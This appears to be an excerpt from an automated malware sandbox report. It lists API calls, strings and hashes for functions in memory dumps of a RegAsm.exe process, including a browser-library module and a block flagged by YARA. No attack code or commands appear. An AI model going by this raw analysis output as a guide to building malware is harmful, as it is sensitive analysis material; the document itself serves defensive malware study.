                                                                                      • Part of subcall function 6CC414B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC41248,6CC41248,?), ref: 6CC414C9
                                                                                      • Part of subcall function 6CC414B0: memcpy.VCRUNTIME140(?,6CC41248,00000000,?,6CC41248,?), ref: 6CC414EF
                                                                                      • Part of subcall function 6CC3EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC3EEE3
                                                                                    • CreateFileW.KERNEL32 ref: 6CC6F4FD
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC6F523
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                    • String ID: \oleacc.dll
                                                                                    • API String ID: 2595878907-3839883404
                                                                                    • Opcode ID: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                                    • Instruction ID: bf251850898c74005623de6b00750e3827e99eb0af08c6eede5676e93464d8a8
                                                                                    • Opcode Fuzzy Hash: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                                    • Instruction Fuzzy Hash: 4D41AE306087509FE720DF6AD984B9AB7F4AF44318F504A1CF59483A50FB30D9498BA2
                                                                                    Function 6CC7E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7E047
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E04F
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E09C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E0B0
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6CC7E057
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                    • API String ID: 1832963901-4276087706
                                                                                    • Opcode ID: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                                    • Instruction ID: 4cc4da9b46a90729d47ce00b5c7ea4e919039f75f84e0613efacdd09bfa4aab1
                                                                                    • Opcode Fuzzy Hash: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                                    • Instruction Fuzzy Hash: F421C275B001088FDF10DFA4D85CAEEB7B5EF45208F144029E90A97741EB31A90AC7F1
                                                                                    Function 6CC974A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000), ref: 6CC97526
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC97566
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC97597
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                    • API String ID: 3217676052-1401603581
                                                                                    • Opcode ID: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                                    • Instruction ID: bcaae2a58e4037b62c7f0040e3b9ac632e3111d96814dac22b187094dc224c5d
                                                                                    • Opcode Fuzzy Hash: 5732aacc14c51ebfd25fcc35d4a704cd0e2e80190042ab8bc60d20784d5fac73
                                                                                    • Instruction Fuzzy Hash: 0D210739702501AFCA148FEAC854E9A3375EB87728F1445A8E405A7F40FB31A8428B99
                                                                                    Function 0040DEB5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DECC
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
                                                                                      • Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
                                                                                      • Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040DEEE
                                                                                    • memcpy.MSVCRT ref: 0040DF2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 214693668-4289949731
                                                                                    • Opcode ID: 87030841b56bcc62358ccb61677a84b8acedd28d2148ee66ae04f16d96e4cb73
                                                                                    • Instruction ID: 3af340325ffd46d07c9016e9fd5090ae59368ed9ded2c1f09607058c21e43e9a
                                                                                    • Opcode Fuzzy Hash: 87030841b56bcc62358ccb61677a84b8acedd28d2148ee66ae04f16d96e4cb73
                                                                                    • Instruction Fuzzy Hash: E411DD317003059FCB24DE9CC981A6AB3E8EB45704B10497EF853EB2C2DB74E9488798
                                                                                    Function 6CC9A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF770,-00000001,?,6CCAE330,?,6CC5BDF7), ref: 6CC9A7AF
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6CC5BDF7), ref: 6CC9A7C2
                                                                                    • moz_xmalloc.MOZGLUE(00000018,?,6CC5BDF7), ref: 6CC9A7E4
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A80A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                    • String ID: accelerator.dll
                                                                                    • API String ID: 2442272132-2426294810
                                                                                    • Opcode ID: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                                    • Instruction ID: 35150c22d8cf806bb711a509f456227c69f05d7e3148b6fe928cb720fcb5e5f9
                                                                                    • Opcode Fuzzy Hash: 278045426007937eac2b31c12e477f06b2d5e7015ad246891c16642f0c2d893b
                                                                                    • Instruction Fuzzy Hash: 7D01A2786003049FDB04CFDAD8C9D5577F8FF8931470480AAE8099B751EB70A800CBA0
                                                                                    Function 6CC3F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ole32,?,6CC3EE51,?), ref: 6CC3F0B2
                                                                                    • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6CC3F0C2
                                                                                    Strings
                                                                                    • ole32, xrefs: 6CC3F0AD
                                                                                    • Could not find CoTaskMemFree, xrefs: 6CC3F0E3
                                                                                    • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6CC3F0DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                    • API String ID: 2574300362-1578401391
                                                                                    • Opcode ID: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                                    • Instruction ID: e8e21632cc7565b75f804de515cb8be09199a1895e5bb69d036ee744cc87cbcf
                                                                                    • Opcode Fuzzy Hash: 41826c5b977149d6489d6105696a1c712016a9be2c042c93e12641924b234564
                                                                                    • Instruction Fuzzy Hash: A7E0D8B47446029F9F041AFEA858A2637BC6B121093005829F906E1F10FA34D4018626
                                                                                    Function 6CC700D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47235), ref: 6CC700D8
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6CC700F7
                                                                                    • FreeLibrary.KERNEL32(?,6CC47235), ref: 6CC7010E
                                                                                    Strings
                                                                                    • wintrust.dll, xrefs: 6CC700D3
                                                                                    • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6CC700F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                    • API String ID: 145871493-2559046807
                                                                                    • Opcode ID: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                                    • Instruction ID: d8a69529154ecd6d3b4706dc8602c4e06d9a4f8a0524c8609cc9cbf440ee710a
                                                                                    • Opcode Fuzzy Hash: eac06c0a08ef49c4804ec8c792a34dd699696796f47c5b2840101911fece71cb
                                                                                    • Instruction Fuzzy Hash: 96E0467C7453869FEF109FE5C9497223AF8E707244F109025A90EC1B50EBB2C000DB28
                                                                                    Function 6CC70080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47204), ref: 6CC70088
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6CC700A7
                                                                                    • FreeLibrary.KERNEL32(?,6CC47204), ref: 6CC700BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                    • API String ID: 145871493-3385133079
                                                                                    • Opcode ID: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                                    • Instruction ID: 36010a133204443830826247e9e8a93c4db88e3cd2d05fee2d32fc5c3da5c18e
                                                                                    • Opcode Fuzzy Hash: 2629ab1c8b645b495e8f9e6138e926cfa5fee034f7433bc796ee29314912e33d
                                                                                    • Instruction Fuzzy Hash: F4E0927C6443859FEF20AFFAD8587027AF8AB1B355F10401AA915D2760EBB6C4009B2A
                                                                                    Function 6CC9C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9C0E9), ref: 6CC9C418
                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC9C437
                                                                                    • FreeLibrary.KERNEL32(?,6CC9C0E9), ref: 6CC9C44C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                    • API String ID: 145871493-2623246514
                                                                                    • Opcode ID: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                                    • Instruction ID: 3891445e8c9b70eaa66cb6624ab46c56df29eb743415b65ae7d71ea7b268d550
                                                                                    • Opcode Fuzzy Hash: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                                    • Instruction Fuzzy Hash: AAE0927C6053419FDB006FF5C9587127AF8A717304F004116AA0991B60EBB2C4018B58
                                                                                    Function 6CC975B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9748B,?), ref: 6CC975B8
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC975D7
                                                                                    • FreeLibrary.KERNEL32(?,6CC9748B,?), ref: 6CC975EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                    • API String ID: 145871493-3641475894
                                                                                    • Opcode ID: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                                    • Instruction ID: 348c6c644ae85138cc4783dc4b3a9e6899b23022aa0d8daaea1c2cbca9274b5b
                                                                                    • Opcode Fuzzy Hash: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                                    • Instruction Fuzzy Hash: 78E0B6BD605342AFEF006FE2C8987037AF8EB06218F1040A5B905F1750EBF08492CF18
                                                                                    Function 6CC97600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC97592), ref: 6CC97608
                                                                                    • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC97627
                                                                                    • FreeLibrary.KERNEL32(?,6CC97592), ref: 6CC9763C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                    • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                    • API String ID: 145871493-1050664331
                                                                                    • Opcode ID: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                                    • Instruction ID: f09001c65f94cf9f0539091b7df4eacd722370439b093256ad51bde58d0dcde6
                                                                                    • Opcode Fuzzy Hash: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                                    • Instruction Fuzzy Hash: 8AE092BC605381AFDF006FEA889C7027AB8EB1B259F004195E905E1750EBB084118B1C
                                                                                    Function 6CC9BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,?,?,6CC9BE49), ref: 6CC9BEC4
                                                                                    • RtlCaptureStackBackTrace.NTDLL ref: 6CC9BEDE
                                                                                    • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC9BE49), ref: 6CC9BF38
                                                                                    • RtlReAllocateHeap.NTDLL ref: 6CC9BF83
                                                                                    • RtlFreeHeap.NTDLL(6CC9BE49,00000000), ref: 6CC9BFA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                    • String ID:
                                                                                    • API String ID: 2764315370-0
                                                                                    • Opcode ID: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                                    • Instruction ID: 8a86a363faa782c4c098ccf222a2f50d9a735a636dd1f8795293fe31ed1f7d9e
                                                                                    • Opcode Fuzzy Hash: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                                    • Instruction Fuzzy Hash: 9F519376B002159FE724CF69CD90B9AB3A6FF84314F294639D51AA7B54E730F9068B80
                                                                                    Function 6CC88E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88E6E
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88EBF
                                                                                    • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F24
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88F46
                                                                                    • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F7A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F8F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                                    • Instruction ID: 3996c22df2696e7c95a5e473bbe47d7e6a0046f0772a66803eab0eb555d8813e
                                                                                    • Opcode Fuzzy Hash: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                                    • Instruction Fuzzy Hash: 855191B5A022168FEB14CF58D880A6F7BB2BF4431CF55052AD516ABB40F731F905CBA1
                                                                                    Function 6CC460E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC460F4
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46180
                                                                                    • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46211
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46229
                                                                                    • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4625E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46271
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
